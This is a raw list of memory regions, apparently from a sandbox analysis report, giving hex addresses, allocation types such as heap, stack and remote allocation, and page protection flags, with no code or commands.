154E5C11000
|
trusted library allocation
|
page read and write
|
||
31DC000
|
trusted library allocation
|
page read and write
|
||
154F6028000
|
trusted library allocation
|
page read and write
|
||
29A001B1000
|
trusted library allocation
|
page read and write
|
||
299E000
|
trusted library allocation
|
page read and write
|
||
3E70000
|
trusted library allocation
|
page read and write
|
||
42EC000
|
trusted library allocation
|
page read and write
|
||
7050000
|
trusted library section
|
page read and write
|
||
3E19000
|
trusted library allocation
|
page read and write
|
||
31DB000
|
trusted library allocation
|
page read and write
|
||
41A2000
|
trusted library allocation
|
page read and write
|
||
4110000
|
trusted library allocation
|
page read and write
|
||
29A10538000
|
trusted library allocation
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
473E000
|
trusted library allocation
|
page read and write
|
||
1404A8000
|
remote allocation
|
page execute and read and write
|
||
205418DF000
|
trusted library allocation
|
page read and write
|
||
32ED000
|
trusted library allocation
|
page read and write
|
||
4062000
|
trusted library allocation
|
page read and write
|
||
1407C2000
|
remote allocation
|
page execute and read and write
|
||
1A956B55000
|
trusted library allocation
|
page read and write
|
||
205417C2000
|
trusted library allocation
|
page read and write
|
||
3E97000
|
trusted library allocation
|
page read and write
|
||
29A74360000
|
trusted library section
|
page read and write
|
||
1A946511000
|
trusted library allocation
|
page read and write
|
||
20541AF9000
|
trusted library allocation
|
page read and write
|
||
4158000
|
trusted library allocation
|
page read and write
|
||
4CBE000
|
trusted library allocation
|
page read and write
|
||
5520000
|
trusted library section
|
page read and write
|
||
5DE0000
|
trusted library section
|
page read and write
|
||
2C44000
|
trusted library allocation
|
page read and write
|
||
3C70000
|
trusted library allocation
|
page read and write
|
||
2EB1000
|
trusted library allocation
|
page read and write
|
||
140493000
|
remote allocation
|
page execute and read and write
|
||
20541A09000
|
trusted library allocation
|
page read and write
|
||
140000000
|
remote allocation
|
page execute and read and write
|
||
1B8168E8000
|
trusted library allocation
|
page read and write
|
||
46DE000
|
trusted library allocation
|
page read and write
|
||
3123000
|
trusted library allocation
|
page read and write
|
||
28625FF000
|
stack
|
page read and write
|
||
205413C1000
|
trusted library allocation
|
page read and write
|
||
2053180B000
|
trusted library allocation
|
page read and write
|
||
E1A90F9000
|
stack
|
page read and write
|
||
1A9467A9000
|
trusted library allocation
|
page read and write
|
||
30D3000
|
trusted library allocation
|
page read and write
|
||
4807000
|
trusted library allocation
|
page read and write
|
||
20541712000
|
trusted library allocation
|
page read and write
|
||
30A5000
|
trusted library allocation
|
page read and write
|
||
6103000
|
heap
|
page read and write
|
||
49B6000
|
trusted library allocation
|
page read and write
|
||
296B4C6E000
|
trusted library allocation
|
page read and write
|
||
B50000
|
trusted library allocation
|
page read and write
|
||
20541B93000
|
trusted library allocation
|
page read and write
|
||
1620000
|
trusted library allocation
|
page read and write
|
||
2EA0000
|
heap
|
page read and write
|
||
2B1A000
|
trusted library allocation
|
page read and write
|
||
7FF7C1110000
|
trusted library allocation
|
page read and write
|
||
296B38AF000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F7C000
|
trusted library allocation
|
page execute and read and write
|
||
1A944BB5000
|
heap
|
page read and write
|
||
6DF0000
|
trusted library allocation
|
page read and write
|
||
2F67000
|
trusted library allocation
|
page read and write
|
||
205315A4000
|
trusted library allocation
|
page read and write
|
||
C1E000
|
stack
|
page read and write
|
||
1218000
|
heap
|
page read and write
|
||
2E313E1000
|
stack
|
page read and write
|
||
1A9568B6000
|
trusted library allocation
|
page read and write
|
||
147E000
|
stack
|
page read and write
|
||
1626000
|
trusted library allocation
|
page execute and read and write
|
||
20541B9A000
|
trusted library allocation
|
page read and write
|
||
5A7E000
|
stack
|
page read and write
|
||
2FB9000
|
trusted library allocation
|
page read and write
|
||
6089000
|
heap
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
5A60000
|
trusted library allocation
|
page execute and read and write
|
||
154F5A75000
|
trusted library allocation
|
page read and write
|
||
308F000
|
stack
|
page read and write
|
||
2052F9A0000
|
heap
|
page read and write
|
||
4258000
|
trusted library allocation
|
page read and write
|
||
3BA7000
|
trusted library allocation
|
page read and write
|
||
49E5000
|
trusted library allocation
|
page read and write
|
||
527E000
|
stack
|
page read and write
|
||
63D5607000
|
stack
|
page read and write
|
||
28C03FE000
|
stack
|
page read and write
|
||
20531524000
|
trusted library allocation
|
page read and write
|
||
30F9000
|
trusted library allocation
|
page read and write
|
||
57D0000
|
trusted library allocation
|
page read and write
|
||
2A20000
|
trusted library allocation
|
page read and write
|
||
28628FE000
|
stack
|
page read and write
|
||
1622000
|
trusted library allocation
|
page read and write
|
||
5920000
|
trusted library allocation
|
page read and write
|
||
2BC7000
|
trusted library allocation
|
page read and write
|
||
5860000
|
heap
|
page read and write
|
||
D6E000
|
heap
|
page read and write
|
||
4F00000
|
heap
|
page execute and read and write
|
||
6010000
|
heap
|
page read and write
|
||
588E000
|
heap
|
page read and write
|
||
215E87E8000
|
trusted library allocation
|
page read and write
|
||
7FF7C1230000
|
trusted library allocation
|
page read and write
|
||
DB4097F000
|
stack
|
page read and write
|
||
1B804767000
|
heap
|
page read and write
|
||
20541699000
|
trusted library allocation
|
page read and write
|
||
29A71EC0000
|
heap
|
page read and write
|
||
DB40A79000
|
stack
|
page read and write
|
||
447C000
|
trusted library allocation
|
page read and write
|
||
2053158A000
|
trusted library allocation
|
page read and write
|
||
1469000
|
heap
|
page read and write
|
||
30CE000
|
stack
|
page read and write
|
||
1A956D30000
|
trusted library allocation
|
page read and write
|
||
5510000
|
trusted library allocation
|
page read and write
|
||
1A9464F0000
|
heap
|
page execute and read and write
|
||
49C0000
|
trusted library allocation
|
page read and write
|
||
47B7000
|
trusted library allocation
|
page read and write
|
||
32B5000
|
trusted library allocation
|
page read and write
|
||
547E000
|
stack
|
page read and write
|
||
215E6E30000
|
trusted library section
|
page read and write
|
||
5FE0000
|
trusted library allocation
|
page execute and read and write
|
||
E02000
|
unkown
|
page readonly
|
||
58B0000
|
trusted library allocation
|
page read and write
|
||
205319A8000
|
trusted library allocation
|
page read and write
|
||
2763F8B0000
|
trusted library allocation
|
page read and write
|
||
2054179C000
|
trusted library allocation
|
page read and write
|
||
1A94695A000
|
trusted library allocation
|
page read and write
|
||
2763F870000
|
heap
|
page read and write
|
||
32B7000
|
trusted library allocation
|
page read and write
|
||
63D570C000
|
stack
|
page read and write
|
||
20541B6D000
|
trusted library allocation
|
page read and write
|
||
30BC000
|
trusted library allocation
|
page read and write
|
||
F24000
|
trusted library allocation
|
page read and write
|
||
61D0000
|
heap
|
page read and write
|
||
FFE000
|
stack
|
page read and write
|
||
56D0000
|
trusted library allocation
|
page execute and read and write
|
||
4DED000
|
stack
|
page read and write
|
||
117D000
|
heap
|
page read and write
|
||
63D47B6000
|
stack
|
page read and write
|
||
D8D81FE000
|
stack
|
page read and write
|
||
215E8874000
|
trusted library allocation
|
page read and write
|
||
10B7000
|
heap
|
page read and write
|
||
3BA1000
|
trusted library allocation
|
page read and write
|
||
5D65000
|
heap
|
page read and write
|
||
2053186A000
|
trusted library allocation
|
page read and write
|
||
215E89BB000
|
trusted library allocation
|
page read and write
|
||
21580092000
|
heap
|
page read and write
|
||
1B804689000
|
heap
|
page read and write
|
||
53CE000
|
stack
|
page read and write
|
||
2054182C000
|
trusted library allocation
|
page read and write
|
||
2C35000
|
trusted library allocation
|
page read and write
|
||
F40000
|
trusted library allocation
|
page read and write
|
||
215E8750000
|
trusted library allocation
|
page read and write
|
||
12D525F0000
|
heap
|
page read and write
|
||
1A946A61000
|
trusted library allocation
|
page read and write
|
||
570E000
|
heap
|
page read and write
|
||
2763F915000
|
heap
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
141B000
|
trusted library allocation
|
page execute and read and write
|
||
F33000
|
trusted library allocation
|
page read and write
|
||
2740F140000
|
heap
|
page read and write
|
||
FA7000
|
trusted library allocation
|
page read and write
|
||
E1A8BCF000
|
stack
|
page read and write
|
||
392D000
|
trusted library allocation
|
page read and write
|
||
6BA4000
|
trusted library allocation
|
page read and write
|
||
2053170E000
|
trusted library allocation
|
page read and write
|
||
2B54000
|
trusted library allocation
|
page read and write
|
||
10CE000
|
stack
|
page read and write
|
||
2AE0000
|
trusted library allocation
|
page read and write
|
||
1011000
|
trusted library allocation
|
page read and write
|
||
346C000
|
trusted library allocation
|
page read and write
|
||
2A9B000
|
trusted library allocation
|
page read and write
|
||
E1A9FCD000
|
stack
|
page read and write
|
||
2AC5000
|
trusted library allocation
|
page read and write
|
||
63D473E000
|
stack
|
page read and write
|
||
188F000
|
stack
|
page read and write
|
||
BF0000
|
heap
|
page read and write
|
||
296B2BB0000
|
heap
|
page read and write
|
||
29CE000
|
trusted library allocation
|
page read and write
|
||
6B80000
|
trusted library allocation
|
page read and write
|
||
140492000
|
remote allocation
|
page execute and read and write
|
||
1400000
|
trusted library allocation
|
page read and write
|
||
4F8E000
|
stack
|
page read and write
|
||
154E3E20000
|
trusted library allocation
|
page read and write
|
||
54DE000
|
stack
|
page read and write
|
||
BC0000
|
heap
|
page read and write
|
||
47A7000
|
trusted library allocation
|
page read and write
|
||
1030000
|
heap
|
page read and write
|
||
568E000
|
stack
|
page read and write
|
||
28C07FD000
|
stack
|
page read and write
|
||
215E9048000
|
trusted library allocation
|
page read and write
|
||
A83BFE000
|
stack
|
page read and write
|
||
1619000
|
trusted library allocation
|
page read and write
|
||
1A95685B000
|
trusted library allocation
|
page read and write
|
||
DB40CFC000
|
stack
|
page read and write
|
||
FF0000
|
trusted library allocation
|
page read and write
|
||
154E606F000
|
trusted library allocation
|
page read and write
|
||
20531517000
|
trusted library allocation
|
page read and write
|
||
1A94678F000
|
trusted library allocation
|
page read and write
|
||
1A946721000
|
trusted library allocation
|
page read and write
|
||
3107000
|
trusted library allocation
|
page read and write
|
||
5510000
|
heap
|
page execute and read and write
|
||
F80000
|
heap
|
page read and write
|
||
75D0000
|
trusted library allocation
|
page read and write
|
||
5500000
|
trusted library allocation
|
page read and write
|
||
5EBD000
|
heap
|
page read and write
|
||
57E0000
|
heap
|
page execute and read and write
|
||
54D0000
|
heap
|
page execute and read and write
|
||
1460000
|
heap
|
page read and write
|
||
2053183B000
|
trusted library allocation
|
page read and write
|
||
2B26000
|
trusted library allocation
|
page read and write
|
||
3276000
|
trusted library allocation
|
page read and write
|
||
1404FC000
|
remote allocation
|
page execute and read and write
|
||
CFA000
|
heap
|
page read and write
|
||
215E8566000
|
trusted library allocation
|
page read and write
|
||
606B000
|
heap
|
page read and write
|
||
D10000
|
heap
|
page read and write
|
||
29CC000
|
trusted library allocation
|
page read and write
|
||
20541653000
|
trusted library allocation
|
page read and write
|
||
5A39000
|
trusted library allocation
|
page read and write
|
||
BA5000
|
heap
|
page read and write
|
||
1A956BC5000
|
trusted library allocation
|
page read and write
|
||
4CBB000
|
trusted library allocation
|
page read and write
|
||
DB40EF9000
|
stack
|
page read and write
|
||
CEB000
|
trusted library allocation
|
page execute and read and write
|
||
53FE000
|
stack
|
page read and write
|
||
1A956C8B000
|
trusted library allocation
|
page read and write
|
||
7FF7C1181000
|
trusted library allocation
|
page read and write
|
||
5970000
|
trusted library allocation
|
page read and write
|
||
49D3000
|
trusted library allocation
|
page read and write
|
||
1417000
|
trusted library allocation
|
page execute and read and write
|
||
5710000
|
trusted library allocation
|
page read and write
|
||
2F85000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F60000
|
trusted library allocation
|
page read and write
|
||
1404F5000
|
remote allocation
|
page execute and read and write
|
||
2DA8000
|
trusted library allocation
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5ECB000
|
heap
|
page read and write
|
||
56DE000
|
stack
|
page read and write
|
||
E1AA1CC000
|
stack
|
page read and write
|
||
CCD000
|
trusted library allocation
|
page execute and read and write
|
||
1620000
|
trusted library allocation
|
page read and write
|
||
3431000
|
trusted library allocation
|
page read and write
|
||
6790000
|
trusted library allocation
|
page read and write
|
||
5CD4000
|
trusted library allocation
|
page read and write
|
||
2AB1000
|
trusted library allocation
|
page read and write
|
||
154E3DB0000
|
heap
|
page read and write
|
||
20541B0C000
|
trusted library allocation
|
page read and write
|
||
704E000
|
stack
|
page read and write
|
||
1A9568EB000
|
trusted library allocation
|
page read and write
|
||
E9C000
|
stack
|
page read and write
|
||
2C33000
|
trusted library allocation
|
page read and write
|
||
2DF9000
|
trusted library allocation
|
page read and write
|
||
7FF7C11C0000
|
trusted library allocation
|
page read and write
|
||
5840000
|
trusted library allocation
|
page execute and read and write
|
||
5A3E000
|
stack
|
page read and write
|
||
7480000
|
trusted library allocation
|
page read and write
|
||
F52000
|
trusted library allocation
|
page read and write
|
||
D47000
|
heap
|
page read and write
|
||
2052F7A0000
|
heap
|
page read and write
|
||
296B4D2F000
|
trusted library allocation
|
page read and write
|
||
F3D000
|
trusted library allocation
|
page execute and read and write
|
||
1210000
|
heap
|
page read and write
|
||
1B80697A000
|
trusted library allocation
|
page read and write
|
||
154FE120000
|
heap
|
page read and write
|
||
1404F3000
|
remote allocation
|
page execute and read and write
|
||
2B24000
|
trusted library allocation
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
15C7000
|
trusted library allocation
|
page execute and read and write
|
||
56DD000
|
heap
|
page read and write
|
||
20541BF7000
|
trusted library allocation
|
page read and write
|
||
215F77E1000
|
trusted library allocation
|
page read and write
|
||
5749000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F6D000
|
trusted library allocation
|
page execute and read and write
|
||
6F4E000
|
stack
|
page read and write
|
||
5770000
|
trusted library allocation
|
page read and write
|
||
296B2CB1000
|
heap
|
page read and write
|
||
7890000
|
trusted library allocation
|
page read and write
|
||
6049000
|
heap
|
page read and write
|
||
14EE000
|
stack
|
page read and write
|
||
1650000
|
trusted library allocation
|
page execute and read and write
|
||
29A10001000
|
trusted library allocation
|
page read and write
|
||
608F000
|
heap
|
page read and write
|
||
B14000
|
unkown
|
page readonly
|
||
588D000
|
trusted library allocation
|
page read and write
|
||
2EDE000
|
stack
|
page read and write
|
||
75B0000
|
trusted library allocation
|
page read and write
|
||
140A000
|
trusted library allocation
|
page execute and read and write
|
||
5930000
|
trusted library allocation
|
page read and write
|
||
28BF7FE000
|
stack
|
page read and write
|
||
F30000
|
heap
|
page read and write
|
||
1A946812000
|
trusted library allocation
|
page read and write
|
||
154E4150000
|
heap
|
page read and write
|
||
63D550E000
|
stack
|
page read and write
|
||
20541B19000
|
trusted library allocation
|
page read and write
|
||
49BB000
|
trusted library allocation
|
page read and write
|
||
2B29000
|
trusted library allocation
|
page read and write
|
||
5D68000
|
heap
|
page read and write
|
||
215E7A09000
|
trusted library allocation
|
page read and write
|
||
33C2000
|
trusted library allocation
|
page read and write
|
||
20531559000
|
trusted library allocation
|
page read and write
|
||
2DD8000
|
trusted library allocation
|
page read and write
|
||
296B2CE9000
|
heap
|
page read and write
|
||
BA0000
|
heap
|
page read and write
|
||
1050000
|
heap
|
page read and write
|
||
215E7CAF000
|
trusted library allocation
|
page read and write
|
||
2763F830000
|
heap
|
page read and write
|
||
296B4415000
|
trusted library allocation
|
page read and write
|
||
2B77000
|
trusted library allocation
|
page read and write
|
||
33CC000
|
trusted library allocation
|
page read and write
|
||
44DC000
|
trusted library allocation
|
page read and write
|
||
215E77D0000
|
heap
|
page execute and read and write
|
||
36E2000
|
trusted library allocation
|
page read and write
|
||
29ED000
|
trusted library allocation
|
page read and write
|
||
3E91000
|
trusted library allocation
|
page read and write
|
||
2B3B000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F40000
|
trusted library allocation
|
page read and write
|
||
1153000
|
trusted library allocation
|
page execute and read and write
|
||
215E6EC4000
|
heap
|
page read and write
|
||
7FF7C11A0000
|
trusted library allocation
|
page read and write
|
||
128E000
|
stack
|
page read and write
|
||
2763F6C4000
|
heap
|
page read and write
|
||
E1A8E7F000
|
stack
|
page read and write
|
||
49BE000
|
trusted library allocation
|
page read and write
|
||
14047F000
|
remote allocation
|
page execute and read and write
|
||
28BF3FE000
|
stack
|
page read and write
|
||
51D0000
|
heap
|
page execute and read and write
|
||
5860000
|
trusted library allocation
|
page execute and read and write
|
||
55DE000
|
stack
|
page read and write
|
||
342E000
|
trusted library allocation
|
page read and write
|
||
597B000
|
trusted library allocation
|
page read and write
|
||
29A71DE9000
|
heap
|
page read and write
|
||
2AB7000
|
trusted library allocation
|
page read and write
|
||
154FE17A000
|
heap
|
page read and write
|
||
5D20000
|
trusted library allocation
|
page execute and read and write
|
||
513F000
|
stack
|
page read and write
|
||
6510000
|
trusted library allocation
|
page read and write
|
||
41C1000
|
trusted library allocation
|
page read and write
|
||
323C000
|
trusted library allocation
|
page read and write
|
||
45FC000
|
trusted library allocation
|
page read and write
|
||
205416C3000
|
trusted library allocation
|
page read and write
|
||
30EA000
|
trusted library allocation
|
page read and write
|
||
1A95698A000
|
trusted library allocation
|
page read and write
|
||
296B453E000
|
trusted library allocation
|
page read and write
|
||
1A946A3A000
|
trusted library allocation
|
page read and write
|
||
2052F9EC000
|
heap
|
page read and write
|
||
30E0000
|
trusted library allocation
|
page read and write
|
||
310B000
|
trusted library allocation
|
page read and write
|
||
2054177E000
|
trusted library allocation
|
page read and write
|
||
2B6D000
|
trusted library allocation
|
page read and write
|
||
D8D8DFE000
|
stack
|
page read and write
|
||
2B58000
|
trusted library allocation
|
page read and write
|
||
7FF7C0F2D000
|
trusted library allocation
|
page execute and read and write
|
||
1030000
|
heap
|
page read and write
|
||
1404C8000
|
remote allocation
|
page execute and read and write
|
||
7FF7C0F5D000
|
trusted library allocation
|
page execute and read and write
|
||
30D0000
|
trusted library allocation
|
page read and write
|
||
7FF7C10F0000
|
trusted library allocation
|
page read and write
|
||
1A946819000
|
trusted library allocation
|
page read and write
|
||
7FF7C1200000
|
trusted library allocation
|
page read and write
|
||
12D52700000
|
heap
|
page read and write
|
||
2DE0000
|
trusted library allocation
|
page read and write
|
||
5890000
|
heap
|
page execute and read and write
|
||
2F70000
|
trusted library allocation
|
page read and write
|
||
49F0000
|
trusted library allocation
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
2BAC000
|
trusted library allocation
|
page read and write
|
||
1A946B41000
|
trusted library allocation
|
page read and write
|
||
1A9467D7000
|
trusted library allocation
|
page read and write
|
||
7FF7C1190000
|
trusted library allocation
|
page read and write
|
||
2DBE000
|
stack
|
page read and write
|
||
74D0000
|
trusted library allocation
|
page read and write
|
||
1428000
|
heap
|
page read and write
|
||
2763F910000
|
heap
|
page read and write
|
||
5FC1000
|
heap
|
page read and write
|
||
20541A9A000
|
trusted library allocation
|
page read and write
|
||
1A956CF2000
|
trusted library allocation
|
page read and write
|
||
570C000
|
trusted library allocation
|
page read and write
|
||
126C000
|
heap
|
page read and write
|
||
215E8A89000
|
trusted library allocation
|
page read and write
|
||
215E8BA6000
|
trusted library allocation
|
page read and write
|
||
28BDFFF000
|
stack
|
page read and write
|
||
29E7000
|
trusted library allocation
|
page read and write
|
||
2971000
|
trusted library allocation
|
page read and write
|
||
5A5E000
|
stack
|
page read and write
|
||
5500000
|
trusted library allocation
|
page read and write
|
||
29A71E31000
|
heap
|
page read and write
|
||
2D91000
|
trusted library allocation
|
page read and write
|
||
2A9E000
|
trusted library allocation
|
page read and write
|
||
205313BE000
|
heap
|
page read and write
|
||
154E3E8B000
|
heap
|
page read and write
|
||
5879000
|
heap
|
page read and write
|
||
CB3000
|
trusted library allocation
|
page execute and read and write
|
||
2763F8F0000
|
heap
|
page read and write
|
||
2E59000
|
trusted library allocation
|
page read and write
|
||
42B8000
|
trusted library allocation
|
page read and write
|
||
140799000
|
remote allocation
|
page execute and read and write
|
||
F36000
|
trusted library allocation
|
page read and write
|
||
1040000
|
trusted library allocation
|
page execute and read and write
|
||
27640B21000
|
trusted library allocation
|
page read and write
|
||
1515000
|
heap
|
page read and write
|
||
205418E6000
|
trusted library allocation
|
page read and write
|
||
74A0000
|
trusted library allocation
|
page read and write
|
||
14AE000
|
stack
|
page read and write
|
||
1B8049C0000
|
heap
|
page read and write
|
||
2F65000
|
trusted library allocation
|
page read and write
|
||
7FF7C1060000
|
trusted library allocation
|
page execute and read and write
|
||
1A95680A000
|
trusted library allocation
|
page read and write
|
||
20541767000
|
trusted library allocation
|
page read and write
|
||
BB0000
|
heap
|
page read and write
|
||
2BA1000
|
trusted library allocation
|
page read and write
|
||
75A0000
|
trusted library allocation
|
page read and write
|
||
7FF7C0FF6000
|
trusted library allocation
|
page read and write
|
||
2C1E000
|
trusted library allocation
|
page read and write
|
||
2053167A000
|
trusted library allocation
|
page read and write
|
||
2F33000
|
trusted library allocation
|
page read and write
|
||
1A946A4E000
|
trusted library allocation
|
page read and write
|
||
447C000
|
trusted library allocation
|
page read and write
|
||
1A94668F000
|
trusted library allocation
|
page read and write
|
||
2F2D000
|
trusted library allocation
|
page read and write
|
||
28BFBFE000
|
stack
|
page read and write
|
||
CB4000
|
trusted library allocation
|
page read and write
|
||
1A946B27000
|
trusted library allocation
|
page read and write
|
||
5AA2000
|
trusted library allocation
|
page read and write
|
||
2E327FF000
|
stack
|
page read and write
|
||
58A0000
|
trusted library allocation
|
page execute and read and write
|
||
28BFFFE000
|
stack
|
page read and write
|
||
2AF9000
|
trusted library allocation
|
page read and write
|
||
11B8000
|
heap
|
page read and write
|
||
215E6E80000
|
heap
|
page read and write
|
||
9D0000
|
unkown
|
page readonly
|
||
20541B44000
|
trusted library allocation
|
page read and write
|
||
2B6F000
|
trusted library allocation
|
page read and write
|
||
2DF5000
|
trusted library allocation
|
page read and write
|
||
2B75000
|
trusted library allocation
|
page read and write
|
||
1143000
|
heap
|
page read and write
|
||
1A95697B000
|
trusted library allocation
|
page read and write
|
||
A847FD000
|
stack
|
page read and write
|
||
6300000
|
trusted library allocation
|
page read and write
|
||
1A956C5F000
|
trusted library allocation
|
page read and write
|
||
1A956CE9000
|
trusted library allocation
|
page read and write
|
||
205313B8000
|
heap
|
page read and write
|
||
2FE1000
|
trusted library allocation
|
page read and write
|
||
20541B49000
|
trusted library allocation
|
page read and write
|
||
67A0000
|
trusted library allocation
|
page read and write
|
||
52DE000
|
stack
|
page read and write
|
||
29A71FE0000
|
heap
|
page read and write
|
||
2960000
|
heap
|
page read and write
|
||
215E6E10000
|
heap
|
page read and write
|
||
B6D000
|
trusted library allocation
|
page execute and read and write
|
||
1A946767000
|
trusted library allocation
|
page read and write
|
||
5C40000
|
trusted library allocation
|
page read and write
|
||
30EB000
|
trusted library allocation
|
page read and write
|
||
2DDC000
|
trusted library allocation
|
page read and write
|
||
154FE7F0000
|
heap
|
page read and write
|
||
154F5C27000
|
trusted library allocation
|
page read and write
|
||
205313BB000
|
heap
|
page read and write
|
||
134E000
|
stack
|
page read and write
|
||
589A000
|
trusted library allocation
|
page read and write
|
||
2DF3000
|
trusted library allocation
|
page read and write
|
||
1A9567F7000
|
trusted library allocation
|
page read and write
|
||
12A1000
|
heap
|
page read and write
|
||
7FF7C0F64000
|
trusted library allocation
|
page read and write
|
||
E1AA04B000
|
stack
|
page read and write
|
||
9D2000
|
unkown
|
page readonly
|
||
14048F000
|
remote allocation
|
page execute and read and write
|
||
7FF7C10F0000
|
trusted library allocation
|
page execute and read and write
|
||
2F40000
|
trusted library allocation
|
page read and write
|
||
554E000
|
stack
|
page read and write
|
||
5F6B000
|
heap
|
page read and write
|
||
1A946A85000
|
trusted library allocation
|
page read and write
|
||
75C000
|
stack
|
page read and write
|
||
2F2B000
|
trusted library allocation
|
page read and write
|
||
215E87DA000
|
trusted library allocation
|
page read and write
|
||
5940000
|
trusted library allocation
|
page read and write
|
||
6CF0000
|
trusted library allocation
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
29A73B50000
|
heap
|
page execute and read and write
|
||
1670000
|
trusted library allocation
|
page read and write
|
||
2F12000
|
trusted library allocation
|
page read and write
|
||
5880000
|
trusted library allocation
|
page read and write
|
||
5C30000
|
trusted library allocation
|
page execute and read and write
|
||
EF7000
|
stack
|
page read and write
|
||
E1A947E000
|
stack
|
page read and write
|
||
D8D89FE000
|
stack
|
page read and write
|
||
DB408FF000
|
stack
|
page read and write
|
||
5550000
|
trusted library allocation
|
page read and write
|
||
1020000
|
trusted library allocation
|
page read and write
|
||
12D50C6E000
|
heap
|
page read and write
|
||
296B4687000
|
trusted library allocation
|
page read and write
|
||
3105000
|
trusted library allocation
|
page read and write
|
||
1A9567A4000
|
trusted library allocation
|
page read and write
|
||
48B3000
|
trusted library allocation
|
page read and write
|
||
2BC3000
|
trusted library allocation
|
page read and write
|
||
1600000
|
trusted library allocation
|
page read and write
|
||
18FC000
|
heap
|
page read and write
|
||
5A80000
|
trusted library allocation
|
page execute and read and write
|
||
CA6000
|
heap
|
page read and write
|
||
5D82000
|
heap
|
page read and write
|
||
1690000
|
heap
|
page read and write
|
||
FCB000
|
trusted library allocation
|
page read and write
|
||
2740D680000
|
direct allocation
|
page execute read
|
||
2763F8E0000
|
heap
|
page readonly
|
||
DB40F7E000
|
stack
|
page read and write
|
||
161A000
|
trusted library allocation
|
page execute and read and write
|
||
5AD0000
|
trusted library allocation
|
page read and write
|
||
2F44000
|
trusted library allocation
|
page read and write
|
||
465C000
|
trusted library allocation
|
page read and write
|
||
63D4B3B000
|
stack
|
page read and write
|
||
75F9000
|
trusted library allocation
|
page read and write
|
||
A843FE000
|
stack
|
page read and write
|
||
7FF7C0FF0000
|
trusted library allocation
|
page read and write
|
||
296B3320000
|
heap
|
page read and write
|
||
2A96000
|
trusted library allocation
|
page read and write
|
||
4497000
|
trusted library allocation
|
page read and write
|
||
29A71DEC000
|
heap
|
page read and write
|
||
D8D7DFE000
|
stack
|
page read and write
|
||
5AA0000
|
trusted library allocation
|
page read and write
|
||
2B18000
|
trusted library allocation
|
page read and write
|
||
296B4B62000
|
trusted library allocation
|
page read and write
|
||
2763F664000
|
heap
|
page read and write
|
||
D8D79FD000
|
stack
|
page read and write
|
||
2DA4000
|
trusted library allocation
|
page read and write
|
||
2DAE000
|
trusted library allocation
|
page read and write
|
||
12D50BE0000
|
heap
|
page read and write
|
||
1A956A1E000
|
trusted library allocation
|
page read and write
|
||
215E6E50000
|
trusted library section
|
page read and write
|
||
1A956AA1000
|
trusted library allocation
|
page read and write
|
||
215E76D6000
|
heap
|
page read and write
|
||
29D2000
|
trusted library allocation
|
page read and write
|
||
34A1000
|
trusted library allocation
|
page read and write
|
||
1A946674000
|
trusted library allocation
|
page read and write
|
||
DA4000
|
heap
|
page read and write
|
||
514E000
|
stack
|
page read and write
|
||
11E6000
|
heap
|
page read and write
|
||
1766000
|
heap
|
page read and write
|
||
D62000
|
heap
|
page read and write
|
||
5D50000
|
trusted library allocation
|
page read and write
|
||
12D50C20000
|
heap
|
page read and write
|
||
540E000
|
stack
|
page read and write
|
||
59E0000
|
trusted library allocation
|
page read and write
|
||
5D10000
|
trusted library allocation
|
page read and write
|
||
215E6E92000
|
heap
|
page read and write
|
||
30A1000
|
trusted library allocation
|
page read and write
|
||
20541BDF000
|
trusted library allocation
|
page read and write
|
||
1A94692D000
|
trusted library allocation
|
page read and write
|
||
2950000
|
trusted library allocation
|
page read and write
|
||
1A9467C3000
|
trusted library allocation
|
page read and write
|
||
215E6EC2000
|
heap
|
page read and write
|
||
1A956511000
|
trusted library allocation
|
page read and write
|
||
29A73A20000
|
heap
|
page read and write
|
||
2E32FFF000
|
stack
|
page read and write
|
||
49B0000
|
trusted library allocation
|
page read and write
|
||
1070000
|
heap
|
page read and write
|
||
15FF000
|
stack
|
page read and write
|
||
E1A91F9000
|
stack
|
page read and write
|
||
1A9567C6000
|
trusted library allocation
|
page read and write
|
||
205317D1000
|
trusted library allocation
|
page read and write
|
||
5F69000
|
trusted library allocation
|
page read and write
|
||
1A946420000
|
trusted library section
|
page read and write
|
||
162E000
|
stack
|
page read and write
|
||
5CCE000
|
stack
|
page read and write
|
||
B63000
|
trusted library allocation
|
page execute and read and write
|
||
13AF000
|
stack
|
page read and write
|
||
7450000
|
trusted library allocation
|
page read and write
|
||
30BE000
|
trusted library allocation
|
page read and write
|
||
205318E4000
|
trusted library allocation
|
page read and write
|
||
5AD0000
|
heap
|
page read and write
|
||
63D467D000
|
stack
|
page read and write
|
||
30F0000
|
trusted library allocation
|
page read and write
|
||
571E000
|
stack
|
page read and write
|
||
3000000
|
trusted library allocation
|
page read and write
|
||
205317EB000
|
trusted library allocation
|
page read and write
|
||
F0F000
|
stack
|
page read and write
|
||
D38000
|
heap
|
page read and write
|
||
193C000
|
stack
|
page read and write
|
||
215E83E4000
|
trusted library allocation
|
page read and write
|
||
1622000
|
trusted library allocation
|
page read and write
|
||
12D50D1F000
|
heap
|
page read and write
|
||
3388000
|
trusted library allocation
|
page read and write
|
||
4480000
|
trusted library allocation
|
page read and write
|
||
D2B000
|
heap
|
page read and write
|
||
2763F68C000
|
heap
|
page read and write
|
||
2B1E000
|
trusted library allocation
|
page read and write
|
||
32B5000
|
trusted library allocation
|
page read and write
|
||
DF0000
|
unkown
|
page readonly
|
||
CC6000
|
trusted library allocation
|
page read and write
|
||
1594000
|
trusted library allocation
|
page read and write
|
||
5F2A000
|
heap
|
page read and write
|
||
58B0000
|
trusted library allocation
|
page execute and read and write
|
||
29A71EE0000
|
heap
|
page read and write
|
||
56A0000
|
trusted library allocation
|
page read and write
|
||
2763F810000
|
heap
|
page read and write
|
||
5E60000
|
heap
|
page read and write
|
||
2763F8D0000
|
trusted library allocation
|
page read and write
|
||
5780000
|
heap
|
page read and write
|
||
B60000
|
trusted library allocation
|
page read and write
|
||
296B2C3C000
|
heap
|
page read and write
|
||
1172000
|
trusted library allocation
|
page read and write
|
||
478F000
|
trusted library allocation
|
page read and write
|
||
1B8048B0000
|
trusted library allocation
|
page read and write
|
||
